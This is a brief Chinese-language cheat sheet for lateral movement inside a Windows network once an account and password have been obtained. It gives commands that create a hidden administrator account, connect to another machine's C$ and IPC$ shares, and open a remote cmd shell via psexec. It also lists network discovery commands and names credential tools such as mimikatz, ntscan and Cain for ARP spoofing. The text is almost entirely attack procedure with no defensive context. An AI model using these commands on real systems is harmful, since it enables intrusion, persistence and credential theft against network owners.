一.获取了账号和密码
1.获取了账号和密码,进行内网碰撞
net user 123 123 /add & net localgroup administrators 123 /add
dir \\192.168.1.1\c$
2.获取了账号和密码,进行内网验证
net use \\192.168.1.1\ipc$ "123" /user:"123"
3.获取了账号和密码,获取cmdshell
psexec \\192.168.1.1 -u 123 -p 123 cmd
二.扫描内网
net view
arp -a
三.内网口令扫描
ntscan.exe
netscan.exe
mimikatz.exe
ARP欺骗及cain的使用